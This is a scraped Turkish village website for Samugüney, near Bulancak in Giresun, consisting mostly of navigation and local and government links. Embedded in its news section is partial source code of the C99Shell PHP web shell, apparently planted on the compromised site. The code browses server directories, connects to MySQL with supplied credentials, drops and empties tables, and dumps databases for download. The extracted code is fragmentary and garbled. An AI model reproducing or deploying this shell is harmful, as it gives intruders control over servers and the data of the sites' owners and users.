Menüyü göremiyorsanız Flash Player`ın yeni versiyonunu yükleyin.

Get Adobe Flash playerSamugüney Köyü Web Sitesi

Samugüney, Ordu - Giresun Karayolu üzerinde Giresun`a 16 km, Bulancak`a 4 km uzaklıkta, bugün takriben 60 hanenin yaşadığı bir sahil köyüdür...
» Devamı için tıklayın...Köyümüzden manzaralar, vefat etmiş olanlardan portreler ve hayatta olanların fotoğrafları bu bölümde...
» Galeri için tıklayınSİZDEN GELENLER / ZİYARETÇİ DEFTERİ

» Ziyaretçi defterine yazmak için tıklayın
 

Giresun Gazeteleri
Ekspres
Haberci
Giresun Işık
Giresun Postası
Yeşil Giresun
Giresun Linkleri
Giresun Belediyeleri
Giresun ilçeleri ve köyleri
Giresun Kaymakamlıkları
Giresun Milletvekilleri
Bulancak Linkleri
Bulancak Belediyesi
Bulancak Kaymakamlığı
Bulancak Emniyet Müdürlüğü
Bulancak Devlet Hastanesi
Bulancak Müftülüğü

 
samugüney haberleri


<?php echo getenv("HTTP_HOST"); ?> - c99 shell

!C99Shell v. !

Software:  

uname -a: ",1); ?> 

",1);} else {echo get_current_user();} ?> 

Safe-mode: 

$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
$d = str_replace("\\\\","\\",$d);
$dispd = htmlspecialchars($d);
$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,strlen($d)-1));
$i = 0;
foreach($pd as $b)
{
$t = "";
reset($e);
$j = 0;
foreach ($e as $r)
{
$t.= $r.DIRECTORY_SEPARATOR;
if ($j == $i) {break;}
$j++;
}
echo "".htmlspecialchars($b).DIRECTORY_SEPARATOR."";
$i++;
}
echo "   ";
if (is_writable($d))
{
$wd = true;
$wdt = "[ ok ]";
echo "".view_perms(fileperms($d))."";
}
else
{
$wd = false;
$wdt = "[ Read-Only ]";
echo "".view_perms_color($d)."";
}
if (is_callable("disk_free_space"))
{
$free = disk_free_space($d);
$total = disk_total_space($d);
if ($free === false) {$free = 0;}
if ($total === false) {$total = 0;}
if ($free < 0) {$free = 0;}
if ($total < 0) {$total = 0;}
$used = $total-$free;
$free_percent = round(100/($total/$free),2);
echo "
Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)";
}
echo "
";
$letters = "";
if ($win)
{
$v = explode("\\",$d);
$v = $v[0];
foreach (range("a","z") as $letter)
{
$bool = $isdiskette = in_array($letter,$safemode_diskettes);
if (!$bool) {$bool = is_dir($letter.":\\");}
if ($bool)
{
$letters .= "[ ";
if ($letter.":" != $v) {$letters .= $letter;}
else {$letters .= "".$letter."";}
$letters .= " ]
";
}
}
if (!empty($letters)) {echo "Detected drives: ".$letters."
";}
}
if (count($quicklaunch) > 0)
{
foreach($quicklaunch as $item)
{
$item[1] = str_replace("%d",urlencode($d),$item[1]);
$item[1] = str_replace("%sort",$sort,$item[1]);
$v = realpath($d."..");
if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
$item[1] = str_replace("%upd",urlencode($v),$item[1]);
echo "".$item[0]."    ";
}
}
?>


if ((!empty($donated_html)) and (in_array($act,$donated_act))) {?>

?>
if ($act == "") {$act = $dspact = "ls";}
if ($act == "sql")
{
$sql_surl = $surl."act=sql";
if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
$sql_surl .= "&";
?>

Attention! SQL-Manager is NOT ready module! Don't reports bugs.

";
if (!$sql_sock) {?>
if ($sql_server)
{
$sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
$err = mysql_smarterror();
@mysql_select_db($sql_db,$sql_sock);
if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
}
else {$sql_sock = false;}
echo "SQL Manager:
";
if (!$sql_sock)
{
if (!$sql_server) {echo "NO CONNECTION";}
else {echo "
Can't connect
"; echo "".$err."";}
}
else
{
$sqlquicklaunch = array();
$sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
$sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
$sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
$sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
$sqlquicklaunch[] = array("Logout",$surl."act=sql");
echo "
MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
";
if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}}
echo "
";
}
echo "
i
 • If login is null, login is owner of process.
 • If host is null, host is localhost
 • If port is null, port is 3306 (default)
 • else
  {
  //Start left panel
  if (!empty($sql_db))
  {
  ?>
   Please, fill the form:
  UsernamePassword Database 
  HostPORT
  ">Home
  $result = mysql_list_tables($sql_db);
  if (!$result) {echo mysql_smarterror();}
  else
  {
  echo "---[ ".htmlspecialchars($sql_db)." ]---
  ";
  $c = 0;
  while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
  "; mysql_free_result($count); $c++;}
  if (!$c) {echo "No tables found in database.";}
  }
  }
  else
  {
  ?>
  Home
  $result = mysql_list_dbs($sql_sock);
  if (!$result) {echo mysql_smarterror();}
  else
  {
  ?>

  Please, select database
  }
  //End left panel
  echo "
  ";
  //Start center panel
  $diplay = true;
  if ($sql_db)
  {
  if (!is_numeric($c)) {$c = 0;}
  if ($c == 0) {$c = "no";}
  echo "
  There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
  ";
  if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}}
  echo "
  ";
  $acts = array("","dump");
  if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,strlen($sql_query)-1).";"; $sql_act = "query";}
  elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
  elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
  elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,strlen($sql_query)-1).";"; $sql_act = "query";}
  elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,strlen($sql_query)-1).";"; $sql_act = "query";}
  elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,strlen($sql_query)-1).";"; $sql_act = "query";}
  elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,strlen($sql_query)-1).";"; $sql_act = "query";}
  elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,strlen($sql_query)-1);} $sql_act = "query";}
  elseif ($sql_tbl_act == "insert")
  {
  if ($sql_tbl_insert_radio == 1)
  {
  $keys = "";
  $akeys = array_keys($sql_tbl_insert);
  foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
  if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
  $values = "";
  $i = 0;
  foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
  if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
  $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
  $sql_act = "query";
  $sql_tbl_act = "browse";
  }
  elseif ($sql_tbl_insert_radio == 2)
  {
  $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
  $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
  $result = mysql_query($sql_query) or print(mysql_smarterror());
  $result = mysql_fetch_array($result, MYSQL_ASSOC);
  $sql_act = "query";
  $sql_tbl_act = "browse";
  }
  }
  if ($sql_act == "query")
  {
  echo "
  ";
  if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
  ".$sql_query_error."
  ";}
  if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  if ((!$submit) or ($sql_act)) {echo "
  "; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "   
  ";}
  }
  if (in_array($sql_act,$acts))
  {
  ?>
  Create new table:
   
  Dump DB:
  "> 
  if (!empty($sql_act)) {echo "
  ";}
  if ($sql_act == "newtbl")
  {
  echo "";
  if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!

  ";
  }
  else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
  Reason: ".mysql_smarterror();}
  }
  elseif ($sql_act == "dump")
  {
  if (empty($submit))
  {
  $diplay = false;
  echo "
  SQL-Dump:

  ";
  echo "DB: 

  ";
  $v = join (";",$dmptbls);
  echo "Only tables (explode \";\") 1: 

  ";
  if ($dump_file) {$tmp = $dump_file;}
  else {$tmp = htmlspecialchars("./dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
  echo "File: 

  ";
  echo "Download:  

  ";
  echo "Save to file:  ";
  echo "  1 - all, if empty";
  echo "
  ";
  }
  else
  {
  $diplay = true;
  $set = array();
  $set["sock"] = $sql_sock;
  $set["db"] = $sql_db;
  $dump_out = "download";
  $set["print"] = 0;
  $set["nl2br"] = 0;
  $set[""] = 0;
  $set["file"] = $dump_file;
  $set["add_drop"] = true;
  $set["onlytabs"] = array();
  if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
  $ret = mysql_dump($set);
  if ($sql_dump_download)
  {
  @ob_clean();
  header("Content-type: application/octet-stream");
  header("Content-length: ".strlen($ret));
  header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
  echo $ret;
  exit;
  }
  elseif ($sql_dump_savetofile)
  {
  $fp = fopen($sql_dump_file,"w");
  if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
  else
  {
  fwrite($fp,$ret);
  fclose($fp);
  echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).").";
  }
  }
  else {echo "Dump: nothing to do!";}
  }
  }
  if ($diplay)
  {
  if (!empty($sql_tbl))
  {
  if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
  $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
  $count_row = mysql_fetch_array($count);
  mysql_free_result($count);
  $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
  $tbl_struct_fields = array();
  while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
  if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
  if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
  if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
  if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
  $perpage = $sql_tbl_le - $sql_tbl_ls;
  if (!is_numeric($perpage)) {$perpage = 10;}
  $numpages = $count_row[0]/$perpage;
  $e = explode(" ",$sql_order);
  if (count($e) == 2)
  {
  if ($e[0] == "d") {$asc_desc = "DESC";}
  else {$asc_desc = "ASC";}
  $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
  }
  else {$v = "";}
  $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
  $result = mysql_query($query) or print(mysql_smarterror());
  echo "
  Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
  ";
  echo "Structure ]   ";
  echo "Browse ]   ";
  echo "Dump ]   ";
  echo "Insert ]   ";
  if ($sql_tbl_act == "structure") {echo "

  Coming sooon!";}
  if ($sql_tbl_act == "insert")
  {
  if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
  if (!empty($sql_tbl_insert_radio))
  {

  }
  else
  {
  echo "

  Inserting row into table:
  ";
  if (!empty($sql_tbl_insert_q))
  {
  $sql_query = "SELECT * FROM `".$sql_tbl."`";
  $sql_query .= " WHERE".$sql_tbl_insert_q;
  $sql_query .= " LIMIT 1;";
  $result = mysql_query($sql_query,$sql_sock) or print("

  ".mysql_smarterror());
  $values = mysql_fetch_assoc($result);
  mysql_free_result($result);
  }
  else {$values = array();}
  echo "
  ";
  foreach ($tbl_struct_fields as $field)
  {
  $name = $field["Field"];
  if (empty($sql_tbl_insert_q)) {$v = "";}
  echo "";
  $i++;
  }
  echo "
  FieldTypeFunctionValue
  ".htmlspecialchars($name)."".$field["Type"]."

  ";
  echo "Insert as new row";
  if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";}
  echo "

  ";
  }
  }
  if ($sql_tbl_act == "browse")
  {
  $sql_tbl_ls = abs($sql_tbl_ls);
  $sql_tbl_le = abs($sql_tbl_le);
  echo "
  ";
  echo "\"Pages\" ";
  $b = 0;
  for($i=0;$i<$numpages;$i++)
  {
  if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";}
  echo $i;
  if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "
  ";}
  if (($i/30 == round($i/30)) and ($i > 0)) {echo "
  ";}
  else {echo " ";}
  }
  if ($i == 0) {echo "empty";}
  echo "
  From:  To:  
  ";
  echo "
  ";
  echo "";
  echo "";
  for ($i=0;$i {
  $v = mysql_field_name($result,$i);
  if ($e[0] == "a") {$s = "d"; $m = "asc";}


  GIRESUN


  GÜNDEM

  E-Devlet Linkleri
  Online Hizmetler
  Milli Eğitim Bakanlığı
  Üniversiteler
  Sağlık Bakanlığı
  Emeklilik Hizmetleri
  Hukuk ve Adalet
  Emniyet Hizmetleri
  Ekonomik ve Mali İşler
  İş ve Eleman Arama
  Genel Devlet Kurumları
  Bakanlıklar
  Valilikler
  Belediyeler
  Kaymakamlıklar
  Siyasi Partiler
  Silahlı Kuvvetler
  Sivil Toplum
  Engelli Sayfaları
  Elçilik - Konsolosluklar
  Deprem Linkleri
  Haber Kaynakları
  Online E-Devlet Hizmetleri
  TC Kimlik No
  Vergi Kimlik No
  SSK Hizmet Dökümü
  İnternet Vergi Dairesi
  Motorlu Taşıtlar Vergisi
  Telefon Rehberi

  ÖSYM Sınav Sonuçları
  ÖSYM Sınav Sonuçları
  YGS Sonuçları
  LYS Sonuçları
  KPSS Sonuçları
  KPDS Sonuçları
  ALES Sonuçları
  TUS Sonuçları
  ÜDS Sonuçları
  ALS Sonuçları
  DGS Sonuçları
  Ana Sayfa | Köyümüz | Resimler | Videolar | Yaylalarımız | Köy Mutfağı | Rehber | Ziyaret Defteri | İletişim

  samuguney.com | Her hakkı saklıdır - Samugüney Köyü © 2006-2010